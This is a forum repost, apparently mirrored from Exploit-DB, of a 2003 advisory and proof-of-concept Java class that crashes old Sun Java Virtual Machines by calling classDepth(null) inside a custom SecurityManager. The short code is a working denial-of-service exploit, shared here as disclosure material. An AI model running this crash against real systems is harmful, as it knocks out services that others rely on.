Exploit Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
23292
Проверка EDB
  1. Пройдено
Автор
MARC SCHOENEFELD
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2003-1134
Дата публикации
2003-10-26
Java:
source: https://www.securityfocus.com/bid/8892/info

A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine. 

/* InsecurityManager-Demonstration */
/* coded by Marc Schoenefeld */
public class InSecurityManager extends SecurityManager {

public void doit() {
System.out.println("doit");
int o = classDepth(null);
}

public static void main(String[] a) {
InSecurityManager m = new InSecurityManager();
m.doit();
}
}
 
Источник
www.exploit-db.com

Похожие темы